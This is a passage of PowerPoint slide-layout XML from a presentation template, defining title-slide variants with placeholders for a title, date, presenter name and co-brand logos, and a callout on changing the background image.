          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="850" b="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2822561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elcome on plum">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent5"/>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0D7B175-CB64-4476-B200-4DEC1EECA3F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1772156" y="1023781"/>
            <a:ext cx="8647689" cy="4810438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED622B88-C9FC-4B1B-873C-53FA653F103A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323037" y="6129338"/>
            <a:ext cx="7166539" cy="381001"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="850" b="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36727796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elcome on dark plum">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent6"/>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0F72321-32C2-4C42-B7F5-D6A9E88FC2D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1772156" y="1023781"/>
            <a:ext cx="8647689" cy="4810438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEBFB27B-6861-45C7-8C6A-BFBC3DB767A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323037" y="6129338"/>
            <a:ext cx="7166539" cy="381001"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="850" b="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1863619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elcome on image">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="tx1">
            <a:lumMod val="40000"/>
            <a:lumOff val="60000"/>
          </a:schemeClr>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7FABB003-C294-4B0B-9C93-02517CC25860}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1772156" y="1023781"/>
            <a:ext cx="8647689" cy="4810438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BAC7702-5E65-4EDB-8265-9DA9A46759F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323037" y="6129338"/>
            <a:ext cx="7166539" cy="381001"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="850" b="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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
        <p:nvSpPr>
          <p:cNvPr id="8" name="Callout: Line 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C54DC228-D03A-4019-B8DF-3DAD0C437B3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="12856683" y="0"/>
            <a:ext cx="2038121" cy="4617720"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 18750"/>
              <a:gd name="adj2" fmla="val -8333"/>
              <a:gd name="adj3" fmla="val 23170"/>
              <a:gd name="adj4" fmla="val -23198"/>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noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How to change image</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-GB" sz="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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Click on ‘View’ on the menu bar</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Choose ‘Slide Master’ </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Insert image and size to fit the page (make sure the coloured strip isn’t covered on the right hand side)</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Right click on the image and choose ‘send to back’</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 View ‘normal’ to exit Slide Master Mode</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1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08893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whit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7" y="1520905"/>
            <a:ext cx="7166539" cy="1637364"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="36000" rIns="36000" bIns="36000" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add presentation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7" y="3176198"/>
            <a:ext cx="7166539" cy="732413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="36000" rIns="36000" bIns="36000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent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
        <p:nvSpPr>
          <p:cNvPr id="34" name="Text Placeholder 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3DFAA06-BCA8-4754-92E2-D4CD6336640A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323037" y="4273068"/>
            <a:ext cx="7166539" cy="216000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>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date</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Text Placeholder 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99D270A3-CD1B-4C74-9532-388A93562569}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323037" y="4514289"/>
            <a:ext cx="7166539" cy="216000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>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name and surname of presenter</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38" name="Picture 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BE95350-3536-4019-9595-2B716E16A64C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10098593" y="91025"/>
            <a:ext cx="1889091" cy="1847974"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E24AF64D-F578-4193-95E2-BB473F64C420}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323037" y="6129338"/>
            <a:ext cx="7166539" cy="381001"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="850" b="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1234077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hite_cobran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7" y="1520905"/>
            <a:ext cx="7166539" cy="1637364"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="36000" rIns="36000" bIns="36000" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add presentation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7" y="3176198"/>
            <a:ext cx="7166539" cy="732413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="36000" rIns="36000" bIns="36000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent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
        <p:nvSpPr>
          <p:cNvPr id="34" name="Text Placeholder 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3DFAA06-BCA8-4754-92E2-D4CD6336640A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323037" y="4273068"/>
            <a:ext cx="7166539" cy="216000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>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date</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Text Placeholder 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99D270A3-CD1B-4C74-9532-388A93562569}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323037" y="4514289"/>
            <a:ext cx="7166539" cy="216000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>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name and surname of presenter</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38" name="Picture 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BE95350-3536-4019-9595-2B716E16A64C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10098593" y="91025"/>
            <a:ext cx="1889091" cy="1847974"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E24AF64D-F578-4193-95E2-BB473F64C420}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323037" y="6129338"/>
            <a:ext cx="7166539" cy="381001"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="850" b="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>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
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6C725A8-685C-4247-9B92-D53F69053616}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323038" y="5118847"/>
            <a:ext cx="907362" cy="769270"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add cobrand logo 1</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{064986E6-A23F-4AA9-874C-3AD76ABF0AA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2618438" y="5118847"/>
            <a:ext cx="907362" cy="769270"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add cobrand logo 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Text Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24CB8F9C-49AA-4300-8B42-5984CB52BE7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3913837" y="5118847"/>
            <a:ext cx="907362" cy="769270"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add cobrand logo 3</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3088969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7" y="1520905"/>
            <a:ext cx="7166539" cy="1637364"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="36000" rIns="36000" bIns="36000" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add presentation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7" y="3176198"/>
            <a:ext cx="7166539" cy="732413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="36000" rIns="36000" bIns="36000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="240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
        <p:nvSpPr>
          <p:cNvPr id="34" name="Text Placeholder 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3DFAA06-BCA8-4754-92E2-D4CD6336640A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323037" y="4273068"/>
            <a:ext cx="7166539" cy="216000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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date</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Text Placeholder 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99D270A3-CD1B-4C74-9532-388A93562569}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323037" y="4514289"/>
            <a:ext cx="7166539" cy="216000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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name and surname of presenter</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
